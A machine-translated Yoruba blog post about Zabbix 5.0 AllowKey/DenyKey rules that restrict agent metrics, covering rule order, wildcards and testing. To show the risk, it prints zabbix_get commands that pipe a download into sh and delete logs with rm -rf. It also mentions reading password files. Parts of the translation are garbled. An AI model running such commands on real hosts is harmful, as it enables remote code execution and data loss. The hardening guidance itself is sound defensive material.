ProHoster > Блог > Isakoso > Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Atokọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju

Tikhon Uskov, Integration Engineer, Zabbix

Data aabo awon oran

Zabbix 5.0 ni ẹya tuntun ti o fun ọ laaye lati ni ilọsiwaju aabo ni awọn eto nipa lilo Aṣoju Zabbix ati rọpo paramita atijọ JekiRemoteCommands.

Awọn ilọsiwaju ni aabo ti awọn ọna ṣiṣe orisun orisun lati inu otitọ pe oluranlowo le ṣe nọmba nla ti awọn iṣe ti o lewu.

  • Aṣoju le gba eyikeyi alaye, pẹlu asiri tabi alaye ti o lewu, lati awọn faili atunto, awọn faili log, awọn faili ọrọ igbaniwọle, tabi eyikeyi awọn faili miiran.

Fun apẹẹrẹ, lilo ohun elo zabbix_get o le wọle si atokọ ti awọn olumulo, awọn ilana ile wọn, awọn faili ọrọ igbaniwọle, ati bẹbẹ lọ.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Wiwọle si data nipa lilo ohun elo zabbix_get

AKIYESI. Data le ṣee gba pada nikan ti aṣoju ba ti ka awọn igbanilaaye lori faili ti o baamu. Ṣugbọn, fun apẹẹrẹ, faili naa /ati be be lo/passwd/ kika nipa gbogbo awọn olumulo.

  • Aṣoju tun le ṣiṣẹ awọn aṣẹ ti o lewu. Fun apẹẹrẹ, bọtini *eto.run[*** ngbanilaaye lati ṣiṣẹ eyikeyi awọn aṣẹ latọna jijin lori awọn apa nẹtiwọọki, pẹlu awọn iwe afọwọkọ ti nṣiṣẹ lati oju opo wẹẹbu Zabbix ti o tun ṣe awọn aṣẹ ni ẹgbẹ aṣoju. 

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

  • Lori Lainos, aṣoju nṣiṣẹ nipasẹ aiyipada laisi awọn anfani root, lakoko ti o wa lori Windows o nṣiṣẹ bi iṣẹ kan bi System ati pe o ni wiwọle si ailopin si eto faili naa. Nitorinaa, ti ko ba si awọn ayipada si awọn aye Agent Zabbix lẹhin fifi sori ẹrọ, aṣoju ni iwọle si iforukọsilẹ, eto faili ati pe o le ṣe awọn ibeere WMI.

Ni sẹyìn awọn ẹya paramita EnableRemoteCommands=0 gba laaye nikan lati mu awọn metiriki kuro pẹlu bọtini *eto.run[]** ati awọn iwe afọwọkọ ti nṣiṣẹ lati oju opo wẹẹbu, ṣugbọn ko si ọna lati ni ihamọ iraye si awọn faili kọọkan, gba tabi mu awọn bọtini kọọkan ti a fi sori ẹrọ pẹlu aṣoju, tabi idinwo lilo awọn paramita kọọkan.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Lilo paramita EnableRemoteCommand ni awọn ẹya iṣaaju ti Zabbix

AllowKey/DenyKey

Zabbix 5.0 ṣe iranlọwọ aabo lodi si iru iraye si laigba aṣẹ nipasẹ ipese awọn iwe funfun ati awọn akojọ dudu fun gbigba ati kọ awọn metiriki ni ẹgbẹ aṣoju.

Ni Zabbix 5.0 gbogbo awọn bọtini, pẹlu *eto.run[]** ti ṣiṣẹ, ati pe awọn aṣayan atunto aṣoju meji ti ṣafikun:

AllowKey = - idasilẹ sọwedowo;

DenyKey= - leewọ sọwedowo;

nibo ni apẹrẹ orukọ bọtini kan wa pẹlu awọn paramita ti o nlo awọn ohun kikọ meta (*).

Awọn bọtini AllowKey ati DenyKey gba ọ laaye lati gba tabi sẹ awọn metiriki kọọkan ti o da lori ilana kan pato. Ko dabi awọn aye atunto miiran, nọmba AllowKey/DenyKey paramita ko ni opin. Eyi n gba ọ laaye lati ṣalaye ni pato kini gangan oluranlowo le ṣe ninu eto naa nipa ṣiṣẹda igi ti awọn sọwedowo - awọn bọtini ṣiṣe, nibiti aṣẹ ti a kọ wọn ṣe ipa pataki pupọ.

Ọkọọkan ti awọn ofin

Awọn ofin ti wa ni ẹnikeji ni awọn ibere ninu eyi ti won ti wa ni titẹ sinu iṣeto ni faili. Bọtini naa jẹ ayẹwo ni ibamu si awọn ofin ṣaaju ibaamu akọkọ, ati ni kete ti bọtini ti nkan data ba ilana naa, o gba laaye tabi kọ. Lẹhin eyi, ṣiṣayẹwo ofin duro ati pe awọn bọtini to ku ni a kọbikita.

Nitorinaa, ti nkan kan ba baamu mejeeji gbigba ati ofin sẹ, abajade yoo dale lori iru ofin wo ni akọkọ ninu faili iṣeto ni.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Awọn ofin oriṣiriṣi 2 pẹlu ilana kanna ati bọtini kan vfs.file.size[/tmp/file]

Ilana lilo awọn bọtini AllowKey/DenyKey:

  1. awọn ofin gangan,
  2. awọn ofin gbogbogbo,
  3. idinamọ ofin.

Fun apẹẹrẹ, ti o ba nilo iraye si awọn faili ni folda kan, o gbọdọ kọkọ gba iraye si wọn, lẹhinna kọ ohun gbogbo miiran ti ko ṣubu laarin awọn igbanilaaye ti iṣeto. Ti o ba ti lo ofin sẹ ni akọkọ, iraye si folda yoo kọ.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Ilana ti o tọ

Ti o ba nilo lati gba awọn ohun elo meji laaye lati ṣiṣẹ nipasẹ *eto.run[]**, ati pe ofin sẹ ni yoo sọ ni akọkọ, awọn ohun elo kii yoo ṣe ifilọlẹ, nitori ilana akọkọ yoo ma baamu bọtini eyikeyi nigbagbogbo, ati pe awọn ofin ti o tẹle ni yoo kọju.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Ti ko tọ ọkọọkan

Awọn apẹrẹ

Ipilẹ awọn ofin

Àpẹẹrẹ jẹ ẹya ikosile pẹlu wildcards. Metacharacter (*) ibaamu eyikeyi nọmba ti eyikeyi ohun kikọ ni ipo kan pato. Metacharacters le ṣee lo mejeeji ni orukọ bọtini ati ni awọn paramita. Fun apẹẹrẹ, o le ṣe asọye ni muna paramita akọkọ pẹlu ọrọ, ki o si pato awọn tetele ọkan bi wildcard.

Awọn paramita gbọdọ wa ni paade ni awọn biraketi onigun mẹrin [].

  • system.run[* - aṣiṣe
  • vfs.file*.txt] - aṣiṣe
  • vfs.file.*[*] - ọtun

Awọn apẹẹrẹ ti lilo wildcard.

  1. Ni awọn bọtini orukọ ati ni paramita. Ni ọran yii, bọtini ko ni ibamu si bọtini iru ti ko ni paramita kan, nitori ninu apẹrẹ a fihan pe a fẹ lati gba ipari kan ti orukọ bọtini ati ṣeto awọn aye.
  2. Ti apẹẹrẹ ko ba lo awọn biraketi onigun mẹrin, ilana naa ngbanilaaye gbogbo awọn bọtini ti ko ni awọn ayeraye ati kọ gbogbo awọn bọtini ti o ni paramita pàtó kan.
  3. Ti bọtini naa ba ti kọ ni kikun ati pe awọn paramita ti wa ni pato bi kaadi ẹgan, yoo baamu eyikeyi bọtini iru pẹlu eyikeyi awọn ayeraye ati pe kii yoo baamu bọtini naa laisi awọn biraketi onigun mẹrin, ie yoo gba laaye tabi kọ.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Ofin fun àgbáye jade sile.

  • Ti bọtini kan pẹlu awọn paramita ti pinnu lati ṣee lo, awọn paramita gbọdọ wa ni pato ninu faili iṣeto ni. Awọn paramita gbọdọ wa ni pato bi metacharacter. O jẹ dandan lati farabalẹ kọ iraye si eyikeyi faili ki o ṣe akiyesi kini alaye ti metiriki le pese labẹ awọn akọtọ oriṣiriṣi - pẹlu ati laisi awọn aye.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Awọn ẹya ara ẹrọ ti awọn bọtini kikọ pẹlu awọn paramita

  • Ti bọtini kan ba jẹ pato pẹlu awọn aye, ṣugbọn awọn paramita jẹ iyan ati pato bi ohun kikọ meta, bọtini kan laisi awọn paramita yoo yanju. Fun apẹẹrẹ, ti o ba ti o ba fẹ lati mu gbigba alaye nipa awọn fifuye lori Sipiyu ki o si pato pe awọn system.cpu.load[*] bọtini yẹ ki o wa alaabo, ma ṣe gbagbe pe awọn bọtini lai sile yoo pada ni apapọ fifuye iye.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

Awọn ofin fun àgbáye ni paramita

Awọn akọsilẹ

Ṣe akanṣe

  • Diẹ ninu awọn ofin ko le ṣe iyipada nipasẹ olumulo, fun apẹẹrẹ, awọn ofin wiwa tabi awọn ofin iforukọsilẹ aifọwọyi. Awọn ofin AllowKey/DenyKey ko ni ipa awọn paramita wọnyi:
    - HostnameNkan
    - HostMetadataItem
    - HostInterfaceIkan

AKIYESI. Ti olutọju kan ba mu bọtini kan kuro, nigbati o ba beere, Zabbix ko pese alaye nipa idi ti metric tabi bọtini ṣe ṣubu sinu 'ẹka'KO ILEYIN' . Alaye nipa awọn idinamọ lori ṣiṣe awọn pipaṣẹ latọna jijin ko tun han ninu awọn faili akọọlẹ aṣoju. Eyi jẹ fun awọn idi aabo, ṣugbọn o le diju n ṣatunṣe aṣiṣe ti awọn metiriki ba ṣubu sinu ẹka ti ko ṣe atilẹyin fun idi kan..

  • O yẹ ki o ko gbekele eyikeyi aṣẹ kan pato fun sisopọ awọn faili atunto ita (fun apẹẹrẹ, ni tito lẹsẹsẹ).

Òfin Line igbesi

Lẹhin ti ṣeto awọn ofin, o nilo lati rii daju pe ohun gbogbo ti wa ni tunto ni deede.

O le lo ọkan ninu awọn aṣayan mẹta:

  • Ṣafikun metiriki kan si Zabbix.
  • Idanwo pẹlu zabbix_agent. Aṣoju Zabbix pẹlu aṣayan -titẹ (-p) fihan gbogbo awọn bọtini (eyi ti o ti wa ni laaye nipasẹ aiyipada) ayafi awon ti o ti wa ni ko gba ọ laaye nipasẹ awọn iṣeto ni. Ati pẹlu aṣayan -idanwo (-t) nitori bọtini ewọ yoo pada 'Bọtini ohun kan ti ko ni atilẹyin'.
  • Idanwo pẹlu zabbix_gba. IwUlO zabbix_gba pẹlu aṣayan -k yoo pada'ZBX_NOTSUPPORTED: Metiriki aimọ'.

Gba laaye tabi kọ

O le kọ iraye si faili kan ki o rii daju, fun apẹẹrẹ, lilo ohun elo naa zabbix_gbawipe wiwọle si faili ti wa ni sẹ.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

**

AKIYESI. Awọn agbasọ ọrọ inu paramita naa ko bikita.

Ni idi eyi, iraye si iru faili le jẹ idasilẹ nipasẹ ọna ti o yatọ. Fun apẹẹrẹ, ti o ba jẹ ọna asopọ kan si.

Akojọ dudu ati atilẹyin iwe funfun fun awọn metiriki ẹgbẹ-aṣoju ni Zabbix 5.0

A ṣe iṣeduro lati ṣayẹwo awọn aṣayan pupọ fun lilo awọn ofin pàtó kan, ati tun ṣe akiyesi awọn aye ti o ṣeeṣe ti awọn idinamọ.

Awọn ibeere ati idahun

Ibeere rẹ. Kilode ti iru ilana ti o nipọn pẹlu ede tirẹ ti yan lati ṣe apejuwe awọn ofin, awọn igbanilaaye ati awọn idinamọ? Kilode ti ko ṣee ṣe lati lo, fun apẹẹrẹ, awọn ọrọ deede ti Zabbix nlo?

Idahun. Eyi jẹ ọran iṣẹ ṣiṣe regex nitori igbagbogbo aṣoju kan wa ati pe o ṣayẹwo nọmba nla ti awọn metiriki. Regex jẹ iṣẹ ti o wuwo pupọ ati pe a ko le ṣayẹwo ẹgbẹẹgbẹrun awọn metiriki ni ọna yii. Wildcards – kan fun gbogbo, o gbajumo ni lilo ati ki o rọrun ojutu.

Ibeere rẹ. Njẹ awọn faili Fikun ko wa ni tito lẹsẹsẹ alfabeti bi?

Idahun. Gẹgẹ bi mo ti mọ, ko ṣee ṣe lati ṣe asọtẹlẹ aṣẹ ninu eyiti awọn ofin yoo lo ti o ba tan awọn ofin kọja awọn faili oriṣiriṣi. Mo ṣeduro gbigba gbogbo awọn ofin AllowKey/DenyKey sinu ọkan Fi faili kun, nitori wọn ṣe ajọṣepọ pẹlu ara wọn, ati pẹlu faili yii..

Ibeere rẹ. Ni Zabbix 5.0 aṣayan 'EnableRemoteCommands=' ko sonu lati faili iṣeto ni, ati AllowKey/DenyKey nikan wa?

Idahun. beeni ooto ni.

Ṣayẹwo bayi!

orisun: www.habr.com

Fi ọrọìwòye kun